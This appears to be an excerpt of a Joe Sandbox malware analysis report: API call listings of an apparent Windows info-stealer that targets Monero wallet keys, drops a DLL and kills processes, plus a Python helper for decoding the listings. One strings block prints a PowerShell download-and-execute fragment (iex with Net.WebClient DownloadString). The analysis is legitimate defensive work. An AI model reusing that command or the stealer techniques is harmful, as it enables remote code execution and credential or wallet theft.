                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 96556f192aee3e3623776ec83cb1c77155fedfc837841c8a2914e5c98f578f6f
                                        • Instruction ID: ac1a1c2fab27b8ac4a68b470df572437373ab41fe51e160d75c5c5a0a172b755
                                        • Opcode Fuzzy Hash: 96556f192aee3e3623776ec83cb1c77155fedfc837841c8a2914e5c98f578f6f
                                        • Instruction Fuzzy Hash: 6121EA71904218EBDB61DFA1DC8CBDDB7B5BB48700F1081CCE609A6290DB789E85CF50
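Every "APIs" block in this section has the same shape: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix, API.MODULE(args) and a "ref:" address, with stack arguments printed as raw 8-digit hex. The example below was written for this page and is not a Joe Sandbox component. It parses those lines, decodes the constants that matter for triage (OpenProcess 00000001 = PROCESS_TERMINATE; RegOpenKeyExA 80000002 and 00020119 = HKEY_LOCAL_MACHINE with KEY_READ | KEY_WOW64_64KEY; InternetOpenUrlA 04000100 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE; Sleep 00001388 = 5000 ms; CreateFileA 40000000 / 00000002 = GENERIC_WRITE / CREATE_ALWAYS) and tags a function by its API set. The sample input is copied from listings above; the flag tables are documented Win32 values, while the capability sets are this example's own heuristics.

```python
"""Parse Joe Sandbox 'APIs' listing lines into structured calls, decode the hex
constants the sandbox prints verbatim, and tag a function by its API set.
Example code for this page, not part of Joe Sandbox. Flag tables are documented
Win32 constants; the CAPABILITIES heuristics are this example's own."""
import re

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w@?$]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

# composite rights first, so they are named before their component bits
KEY_ACCESS = [("KEY_ALL_ACCESS", 0xF003F), ("KEY_READ", 0x20019), ("KEY_WOW64_64KEY", 0x100),
              ("KEY_WOW64_32KEY", 0x200), ("KEY_SET_VALUE", 0x2), ("KEY_CREATE_SUB_KEY", 0x4)]
PROCESS_ACCESS = [("PROCESS_ALL_ACCESS", 0x1FFFFF), ("PROCESS_TERMINATE", 0x1), ("PROCESS_CREATE_THREAD", 0x2),
                  ("PROCESS_VM_OPERATION", 0x8), ("PROCESS_VM_READ", 0x10), ("PROCESS_VM_WRITE", 0x20),
                  ("PROCESS_QUERY_INFORMATION", 0x400), ("PROCESS_QUERY_LIMITED_INFORMATION", 0x1000)]
FILE_ACCESS = [("GENERIC_READ", 0x80000000), ("GENERIC_WRITE", 0x40000000), ("GENERIC_EXECUTE", 0x20000000)]
INET_FLAGS = [("INTERNET_FLAG_RELOAD", 0x80000000), ("INTERNET_FLAG_SECURE", 0x00800000),
              ("INTERNET_FLAG_NO_CACHE_WRITE", 0x04000000), ("INTERNET_FLAG_NO_COOKIES", 0x00080000),
              ("INTERNET_FLAG_NO_UI", 0x200), ("INTERNET_FLAG_PRAGMA_NOCACHE", 0x100)]
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# api -> {argument index: (kind, table)}; only positions the sandbox prints as literals are useful
ARG_DECODERS = {
    "OpenProcess": {0: ("mask", PROCESS_ACCESS)},
    "RegOpenKeyExA": {0: ("enum", HIVES), 3: ("mask", KEY_ACCESS)},
    "CreateFileA": {1: ("mask", FILE_ACCESS), 4: ("enum", DISPOSITION)},
    "InternetOpenUrlA": {4: ("mask", INET_FLAGS)},
    "CreateToolhelp32Snapshot": {0: ("enum", {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"})},
    "Sleep": {0: ("ms", None)},
}
CAPABILITIES = [  # heuristics of this example, keyed on the API set of one function listing
    ("process-kill sweep", {"CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"}),
    ("drop, load and delete a DLL", {"CreateFileA", "LoadLibraryA", "DeleteFileA"}),
    ("HTTP download via WinINet", {"InternetOpenUrlA", "InternetReadFile"}),
    ("registry key/value enumeration", {"RegEnumKeyExA", "RegQueryValueExA"}),
]

def _arg(text):
    """Stack slots are 8-digit hex; anything else ('?', a path) stays a string."""
    return int(text, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", text) else text

def parse_listing(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("mod"), "subcall": m.group("sub"),
                      "ref": m.group("ref"), "args": [_arg(a) for a in raw.split(",")] if raw else []})
    return calls

def decode_mask(value, table):
    names, rest = [], value
    for name, bits in table:
        if (rest & bits) == bits:
            names.append(name)
            rest &= ~bits
    if rest or not names:
        names.append(hex(rest))          # leftover bits the table does not know
    return names

def decode_args(call):
    out = {}
    for idx, (kind, table) in ARG_DECODERS.get(call["api"], {}).items():
        if idx < len(call["args"]) and isinstance(call["args"][idx], int):
            v = call["args"][idx]
            out[idx] = (decode_mask(v, table) if kind == "mask"
                        else [table.get(v, hex(v))] if kind == "enum" else [f"{v} ms"])
    return out

def capabilities(calls):
    apis = {c["api"] for c in calls}
    return [name for name, need in CAPABILITIES if need <= apis]

SAMPLE_LISTING = r"""
• Part of subcall function 007C9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007C08DC,C:\ProgramData\chrome.dll), ref: 007C9871
• Part of subcall function 007BA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007BA098
• StrCmpCA.SHLWAPI(00000000,01658A28), ref: 007C0922
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007C0C35
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007B5061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 007B5091
• wsprintfA.USER32 ref: 007B9E7F
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C99C5
• Process32Next.KERNEL32(007BA056,00000128), ref: 007C99F2
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C9A4E
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007C9A6C
• RegOpenKeyExA.ADVAPI32(80000002,0164B8D8,00000000,00020119,00000000), ref: 007C786D
• Sleep.KERNEL32(00001388), ref: 007BA013
"""  # lines copied from the listings above

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print(c["ref"], c["api"], decode_args(c))
    print(capabilities(parsed))
```

The sandbox prints whatever is on the stack at the call site, so a slot is only meaningful at positions that are genuine immediate constants; the decoder therefore limits itself to a few well-known argument positions and leaves pointers and "?" alone. Pasting one function's "APIs" block, rather than the mixed sample above, gives that function's capability tags.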
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B8D8,00000000,00020119,00000000), ref: 007C786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E9E8,00000000,00000000,?,000000FF), ref: 007C788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C7898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 0dfdceb9bfc93499fe266338ce250124e91c27f7286f949024b68ae7e668d05b
                                        • Instruction ID: 5ccd67523a7984da7121d03554d761f81f96e9e9a613903d398bccb632453244
                                        • Opcode Fuzzy Hash: 0dfdceb9bfc93499fe266338ce250124e91c27f7286f949024b68ae7e668d05b
                                        • Instruction Fuzzy Hash: 2901FF75A48305BBEB04DBE4DD4DFAE77B8EB48700F104198FA05A6290EB74A901CB50
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C78C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C78CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B8D8,00000000,00020119,007C7849), ref: 007C78EB
                                        • RegQueryValueExA.ADVAPI32(007C7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007C790A
                                        • RegCloseKey.ADVAPI32(007C7849), ref: 007C7914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 28f1ed82e3ed692ef91a899d9af6f961e9a8048da6a3879c0ffea79d82105a47
                                        • Instruction ID: b9d610b50479053e77bc1bb0379356561b74023d12e719db3fe3b0feef2986b2
                                        • Opcode Fuzzy Hash: 28f1ed82e3ed692ef91a899d9af6f961e9a8048da6a3879c0ffea79d82105a47
                                        • Instruction Fuzzy Hash: 6B0112B5A44309BFEB00DBE4DC4AFAEB778EB44700F104599F605A7291EB74AA01CB91
                                        APIs
                                        • CreateFileA.KERNEL32(>=|,80000000,00000003,00000000,00000003,00000080,00000000,?,007C3D3E,?), ref: 007C948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=|), ref: 007C94A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 007C94B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=|$>=|
                                        • API String ID: 1378416451-3540557206
                                        • Opcode ID: 5db64b7e46b894f9f4f2e90f227ff0827f78d09d6be57659756f6523c637a04d
                                        • Instruction ID: 06f37de0e9e9e0bc7130e040771afaa57fdd5322a2dc4e776eac162a798c6e2a
                                        • Opcode Fuzzy Hash: 5db64b7e46b894f9f4f2e90f227ff0827f78d09d6be57659756f6523c637a04d
                                        • Instruction Fuzzy Hash: 32F03135E04208BBDB54DBF0EC4DF5F77BAAB48710F208658FA11A7190DA7497029B40
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                        • LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 9dc19aa47de097bc3fd8d36d6644eb416c307c04f71b1200baea858a80eb8515
                                        • Instruction ID: 15b7e0c2c456f28fb8d28d0681e6fa11e9b48a52b62d134b17ed6cef500285cd
                                        • Opcode Fuzzy Hash: 9dc19aa47de097bc3fd8d36d6644eb416c307c04f71b1200baea858a80eb8515
                                        • Instruction Fuzzy Hash: 3E31CC74A0420DEFDB14DFA4D885BEE77B5BF48705F108158E911A7290D778AA81CFA1
                                        APIs
                                        • lstrcat.KERNEL32(?,0165EC70), ref: 007C4A2B
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C4A51
                                        • lstrcat.KERNEL32(?,?), ref: 007C4A70
                                        • lstrcat.KERNEL32(?,?), ref: 007C4A84
                                        • lstrcat.KERNEL32(?,0164A898), ref: 007C4A97
                                        • lstrcat.KERNEL32(?,?), ref: 007C4AAB
                                        • lstrcat.KERNEL32(?,0165DBA0), ref: 007C4ABF
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F20: GetFileAttributesA.KERNEL32(00000000,?,007B1B94,?,?,007D577C,?,?,007D0E22), ref: 007C8F2F
                                          • Part of subcall function 007C47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007C47D0
                                          • Part of subcall function 007C47C0: RtlAllocateHeap.NTDLL(00000000), ref: 007C47D7
                                          • Part of subcall function 007C47C0: wsprintfA.USER32 ref: 007C47F6
                                          • Part of subcall function 007C47C0: FindFirstFileA.KERNEL32(?,?), ref: 007C480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 486f07fd55da75a947b334dcac7f61d6e46515d1be8f239ae561ffcba412ad16
                                        • Instruction ID: 68a787850d0f716cfdba5b3783d2b06b660c70209e53ce94fa30bd90fc6ebefa
                                        • Opcode Fuzzy Hash: 486f07fd55da75a947b334dcac7f61d6e46515d1be8f239ae561ffcba412ad16
                                        • Instruction Fuzzy Hash: FD3140F2900218A7DB14EBB0DC99FDD733CAB58700F40458DB24596051EE78EBC9CB95
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C2FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007C2F14
                                        • ')", xrefs: 007C2F03
                                        • <, xrefs: 007C2F89
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007C2F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: b52db8f17ceb69c03c0bce590d0609147d714027796d4176f4750e879a82b134
                                        • Instruction ID: 5c7f9554fe956aba5f091d477407059d1f205bc10d34336d9227f7e2768a6925
                                        • Opcode Fuzzy Hash: b52db8f17ceb69c03c0bce590d0609147d714027796d4176f4750e879a82b134
                                        • Instruction Fuzzy Hash: 96410EB1D1020CEADB14FFA0C86AFDDBB79AF10305F40445DE10666192DF786A49CF91
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0165D8A0,00000000,00020119,?), ref: 007C4344
                                        • RegQueryValueExA.ADVAPI32(?,0165ED00,00000000,00000000,00000000,000000FF), ref: 007C4368
                                        • RegCloseKey.ADVAPI32(?), ref: 007C4372
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C4397
                                        • lstrcat.KERNEL32(?,0165EBB0), ref: 007C43AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 8014fa2350dda92b22d82856f2814c069e6f2426e2ce6ad105e8fb1df85fda2c
                                        • Instruction ID: 7fc0c812557c4e4862c6699324c011492717c9ba19ebfb839681b1cb53266cc9
                                        • Opcode Fuzzy Hash: 8014fa2350dda92b22d82856f2814c069e6f2426e2ce6ad105e8fb1df85fda2c
                                        • Instruction Fuzzy Hash: 3C418CB6900108ABDB24EBE0EC9AFEE737CAB88700F40455CB71557181EE7597898BE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: c8952de6ea864989b2d05088dec342e2b954ad51ca26404bec099d3883e60c98
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 01218C72D00638ABDB329F59EC41A7F3A69FB85BA4F054129F809E7211D3308DC18BE1
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 007C6C0C
                                        • sscanf.NTDLL ref: 007C6C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007C6C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007C6C60
                                        • ExitProcess.KERNEL32 ref: 007C6C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 2525b5e46587fcc2b341a3bfb01865080524dd99ac7d071d3e96e7b3a46d631a
                                        • Instruction ID: 4bcae163483474987397689f41bae9f9f921999f6c34565442f96d611c21dca0
                                        • Opcode Fuzzy Hash: 2525b5e46587fcc2b341a3bfb01865080524dd99ac7d071d3e96e7b3a46d631a
                                        • Instruction Fuzzy Hash: 7121CD75D14208ABCF14DFE4E885EEEB7B5BF48300F14852DE516A3250EB349604CB65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B7F8,00000000,00020119,?), ref: 007C7FEE
                                        • RegQueryValueExA.ADVAPI32(?,0165DB40,00000000,00000000,000000FF,000000FF), ref: 007C800F
                                        • RegCloseKey.ADVAPI32(?), ref: 007C8022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: fd3ff9c0dae2790719b9d0483b8a25e81d0d95615155a5c37ceab16b4cedbe7f
                                        • Instruction ID: 09f532e424543c725da2ba1dde3cd42daf7d447dc8faf045c8dd494fc4581900
                                        • Opcode Fuzzy Hash: fd3ff9c0dae2790719b9d0483b8a25e81d0d95615155a5c37ceab16b4cedbe7f
                                        • Instruction Fuzzy Hash: F2114FB1A44205ABD700CBD4DD49FAFBB78EB44B10F10421DF615A7290E77999018BA1
                                        APIs
                                        • StrStrA.SHLWAPI(0165ED30,00000000,00000000,?,007B9F71,00000000,0165ED30,00000000), ref: 007C93FC
                                        • lstrcpyn.KERNEL32(00A87580,0165ED30,0165ED30,?,007B9F71,00000000,0165ED30), ref: 007C9420
                                        • lstrlen.KERNEL32(00000000,?,007B9F71,00000000,0165ED30), ref: 007C9437
                                        • wsprintfA.USER32 ref: 007C9457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: f1c512d591492977edaf2d0d96e8831030c3ce3ba77be9bb59f04c5cc880867d
                                        • Instruction ID: 8e9972a3f2074eb4bf91fbbd08ad806777de7ed10cd858237f0dff7bde4b3cac
                                        • Opcode Fuzzy Hash: f1c512d591492977edaf2d0d96e8831030c3ce3ba77be9bb59f04c5cc880867d
                                        • Instruction Fuzzy Hash: 0301DA75504108FFCB08DFA8C988EAE7BB8EB48304F208648F9199B654D735EA51DB90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007B12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007B12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 007B12FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: e6cd1c3f595c6150f80139131537a209928ec450a406dfc972a11e7f4e319bbd
                                        • Instruction ID: a1fbba6884bdd198ef643a73a940eaeb28991f9bc290ad17e3d1cf06f8f4c9c5
                                        • Opcode Fuzzy Hash: e6cd1c3f595c6150f80139131537a209928ec450a406dfc972a11e7f4e319bbd
                                        • Instruction Fuzzy Hash: D401E179A44209BFDB04DFD4DC89FEEB778EB48701F104195FA1597290EB74DA018B90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: f1f576fb6381658de0b998c511a845b82e49221a42cde3c1cf1177859d556d6b
                                        • Instruction ID: 533376c1657d815f4721ecdd08369ac4ac7c49fbacfe8e984802e28ac112145a
                                        • Opcode Fuzzy Hash: f1f576fb6381658de0b998c511a845b82e49221a42cde3c1cf1177859d556d6b
                                        • Instruction Fuzzy Hash: 2B41E6B010079C9EDB328B24CD95FFBBBEC9B45704F1444ECE98E96142E2759E459F60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007C6903
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C69C6
                                        • ExitProcess.KERNEL32 ref: 007C69F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: c3d5030219b575bafd564d992ffeabc8572ecb9f6a98976939c7ff3c566d0972
                                        • Instruction ID: f134fa05e15bb02d6647ec306795ad11db5de32d0e249b7c8d33b1f50b75da41
                                        • Opcode Fuzzy Hash: c3d5030219b575bafd564d992ffeabc8572ecb9f6a98976939c7ff3c566d0972
                                        • Instruction Fuzzy Hash: 053126F1901218EADB14EF90DC9AFDEB778AF08304F40418CF20666191DF78AA48CF69
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007D0E10,00000000,?), ref: 007C89BF
